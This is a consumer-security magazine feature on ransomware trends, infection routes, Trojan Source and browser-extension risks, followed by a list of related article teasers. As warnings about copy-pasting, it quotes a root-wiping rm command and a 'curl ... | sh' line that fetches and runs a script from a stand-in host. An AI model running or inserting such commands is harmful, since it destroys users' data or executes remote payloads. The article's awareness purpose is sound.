These days we’re never far from cybercrime-themed headlines. What was very much in the realms of sci-fi a couple of decades ago has become almost commonplace today.
In the past few years we’ve seen largescale attacks against Ukraine’s power grid, Sony Pictures, the Colonial Oil Pipeline, JBL-SA( the world’s largest meat supplier) and South African shipping firm Transnet. Such attacks often aim to cause damage and disruption (the power grid attack left hundreds of thousands without power for hours). And sometimes the aim is political. For example, the Sony Pictures hack is widely believed to have originated from North Korea, with hackers demanding The Interview (a Kim Jong Un-themed comedy) be withdrawn. Which it was, although not before gigabytes of embarrassing emails and personal information on Sony Pictures staff was shared.
Latterly though, hackers are financially motivated. They want their targets to pay (usually in cryptocurrency), either to restore access to their systems, or to avoid sensitive information being publicised. The last three attacks mentioned above all occurred in 2021, and are examples of such ransomware attacks. Ransom demands can be high too: the Colonial Pipeline hackers received $10 million (most of which was recovered), and prolific (but now defunct) ransomware outfit REvil requested $70 million following a supply chain attack on managed software company Kaseya. Thanks to the ease with which fiat currency could be exchanged for Bitcoin, ransomware attacks launched against home users have proven profitable, too.
The tired old line “Linux doesn’t get viruses” (or ransomware, or whatever other kind of badware you might care to name) was never really true. Internetfacing Linux servers have long been a target for all kinds of mischief, and with so many Linux-powered Internet of Things devices joining the party, such intrusions are only going to increase.
Directed attacks against home users are waning, primarily because there are much more lucrative targets out there, but that’s no excuse for complacency. We’ll show you the modern threatscape, refresh some best practices and hopefully get your 2022 off to the safest start possible. So let’s get to it!
It’s bad and it’s getting worse. But running outdated versions of Windows doesn’t help anyone.
A few years back guilt-ware attacks were common. Unsuspecting users would log into their machines and be greeted with a banner stating they were under investigation for nebulous crimes. Anything from to piracy, to pornography or promulgation of terror materials. But don’t worry, says the warning – all of this will go away if you just wire some cryptocoins to this address.
The message goes on to explain how to acquire said coins, and warns that if you don’t pay, you’ll be arrested. That these kinds of attacks were ever successful (and sometimes still are) speaks volumes about people’s gullibility. It also shows some people have some quite funky ideas about how justice works. Yet we shouldn’t be so dismissive – there’s some psychology behind this.
There’s a widely held theory that everyone has some latent guilt about something they’ve done in the past and not ‘fessed up to. And tapping into this with a scary message can make the subject feel rumbled. Detectives take advantage of this (and all kinds of other techniques) when questioning suspects.
Still, it’s the kind of message that lots of people (especially anyone used to browsing the internet without a pop-up blocker), will just close and ignore. So later evolutions of this attack would go a stage further, either locking the victim out of the machine entirely (forcing the user to choose between a complete reinstall or a quick ransom payment) or encrypting any user documents it finds. This is what ransomware typically refers to today. Thanks to networking (and a rich underground scene in the trade of network exploits) damage may quickly spread to other machines too, and before you know it a stray click on a single machine might bring about a network-wide incident.
Naturally, businesses are a much more lucrative target with (according to Coveware) the average payout in 2020 being $233,817. Attacks on home users might ask for anywhere between the equivalent of $200 to $2,000, which is why they don’t tend to grab the headlines anymore. Home users may also feel uncomfortable about reporting a ransomware attack, but they shouldn’t. Even if the authorities can’t help, reporting the incident (to the likes of CISA in the US or the NCA in the UK) will at least help them measure the scale of the threat. For businesses, the projected cost of recovery might well exceed the ransom, at which point it makes business sense to cough up. Insurers are starting to recognise this now and some (controversially) even include ransomware payments in their policies.
HOW TO BECOME INFECTED
Unfortunately, most if not all ransomware outbreaks start with human error. This might be through social engineering, spear phishing campaigns (where high-profile individuals are targeted and tricked into handing over data with seemingly legitimate messages), rogue browser add-ons, dodgy websites, dodgy mobile apps, poisoned email attachments… the list goes on.
Sometimes human error upstream is to blame. For example, SIM-swapping attacks might involve tricking a customer service agent to porting a number to another SIM. This might then enable 2FA to be compromised on all of the accounts linked to that number. Whatever the method, once a human has erred, there’s not a lot even the most secure(-est) system in the world can do remedy things
The WannaCry outbreak in 2017, which nearly crippled the UK’s largely Windows 7-powered NHS, was a little different, since its spread was mostly as a result of a vulnerability in the SMB protocol. That vulnerability was actually known to NSA researchers, who named it EternalBlue. Unfortunately someone (perhaps a rogue contractor) made away with its details. And later, just before WannaCry hit, the vulnerability was published by a group calling themselves the ShadowBrokers. EternalBlue, which enables privileged code execution on remote systems, was also leveraged in the NotPetya ransomware outbreak, which disrupted global shipping.
Taking a few basic precautions is much easier than cleaning up a nasty digital infection
Basic internet hygiene is the single best defence for home users against ransomware, and malware in general. Unfortunately “the basics” encompasses many different areas these days that deserve their own cover features. Still, let’s at least try and summarise them here.
We hope you’re not the sort of person to click random links in suspect-looking emails, at the very least one should hover over them (or copy and paste the link into a text document) to make sure it links to a legitimate domain (and not something using deceptive characters like goog1e.com, or deceptive subdomains like google.domain.cm). Speaking of copying and pasting, be extra careful when doing so with code excerpts. Not only is there the risk the command itself will do something bad, like rm -rf –no-root-preserve /, but thanks to the wonders of CSS and Unicode it’s easy to inject invisible characters that you won’t see until they’re pasted (and conceivably not even then). Just appending ; curl ransomware.xyz/pwn.sh | sh is one way to stop a benign command being so benign. Not a real URL, by the way. Bidirectional (Bidi) character encodings have been used to obfuscate file extensions of email-borne malware in the past.
Passing on the compromise
And now a more insidious form of this attack has been discovered, dubbed Trojan Source. It turns out that most compilers, while supporting and encouraging Unicode source files, don’t really have any mitigations against obfuscated Bidi additions. So a lazy developer might copy and paste a code snippet from Stack Overflow, then not only risk having their own compiler exploited, but if they then upload that code to a popular project, the whole well becomes poisoned. You can read about it at https://krebsonsecurity.com/2021/11/trojan-sourcebug-threatens-the-security-of-all-code. The scope of the attack is huge, because it enables essentially arbitrary, invisible code to be added. This might be keyloggers, ransomware or any number of other bad things.
There are a number of other add-ons you might want to use to protect privacy. But be aware that the Firefox add-ons repository and Chrome Web Store aren’t monitored for malicious code. So exercise caution when downloading new add-ons. Even genuine add-ons contain code that can be exploited, either by a rogue add-on or a maliciously crafted web page. A study entitled DoubleX: Statically Detecting Vulnerable Data Flows in Browser Extensions at Scale found 184 extensions that could be exploited this way. An unchecked eval function in a privileged extension might allow a web page to do anything that extension can. A likewise stray tabs. execute() call would allow remote code inclusion.
Continue reading your story on the app
Continue reading your story in the magazine
Bluehost Web Hosting
Feature-packed hosting geared towards WordPress, discovers Mike Williams.
Build a Python-based reaction game
Les Pounder goes back to the early days of the Raspberry Pi to look at a board that made a big difference to his career.
BULLET-PROOF UBUNTU 22.04
Walpurgis Night is nearly upon us, so cast aside your old OS and begin life anew with Ubuntu 22.04
Armbian 22.02 Jammy XFCE
Les Pounder takes a look at a distro that supports 64 different Linux single board computers, and now he has to buy them all.
ALL HANDS ON DECK
Jonni Bidwell pries Valve's Steam Deck from PC Gamer's cold, anthropomorphised hands and gets his game on.
Arducam Auto-focus 16MP Camera module
Quick-off-the-draw Les Pounder can't shoot shots faster than this camera.
The Last Cube
Management isn't keen on sentient anything, it's bad for productivity, so Neil Mohr keeps the thinking to a minimum which isn't helping here at all...
Ubuntu 22.04 LTS
If there's one thing Mayank Sharma likes even less than Ubuntu, it's Ubuntu LTS releases, which are notably stable but not notable generally.
A basic website hosing option for small and medium businesses that Shashank Sharma thinks should be on your short list.
Linux Mint DE 5
Whenever there's a new LMDE release, Mayank Sharma can't help but think of the old adage: "It's the thought that counts.”
THE BEST FREE SOFTWARE FOR YOUR PC
START OFF RIGHT WITH SOLID SECURITY TOOLS, PRODUCTIVITY SOFTWARE, AND OTHER PROGRAMS THAT EVERY PC NEEDS.
Covid-19 Provides Cover for Hackers
The travails of a banking software maker show how vulnerable corporate security is
Microsoft Ends Free Windows 7 Security Updates
If you’re still using Microsoft’s Windows 7, your computer might soon be at risk.
With The App Defense Alliance, Google Play Protect Might Actually Keep Malware Off Your Phone
Google has announced a new alliance to augment its inadequate Play Protect malware-detection system.
Welcome To The Hacker Hotel!
Back doors to your personal data can be found all over hotel rooms, from the smart TV to the remote control drapes.
Sophisticated Surveillance Malware Spotted On Android And iOS Phones
Most of the malware targeting phones is the product of a handful of disaffected people looking to make a quick buck.
British Cyber Expert Pleads Guilty To Creating Malware
A British cybersecurity researcher credited with stopping a worldwide computer virus has pleaded guilty to developing malware to steal banking information.
Asus Computers Infected By Auto-update Virus
In a sophisticated targeted espionage operation, hackers infected tens of thousands of computers from the Taiwanese vendor ASUS with malicious software using the company’s online automatic update service, security researchers reported this week.
That Russia Router Malware Threat Might Be Worse Than Feared!
In some cases, a full factory reset may be required.
The Pegasus Plot Thickens
The government staunchly denies allegations of having used foreign malware to snoop on private indian citizens. But the controversy has raised major concerns about violations of individual privacy and effective checks to prevent misuse of state power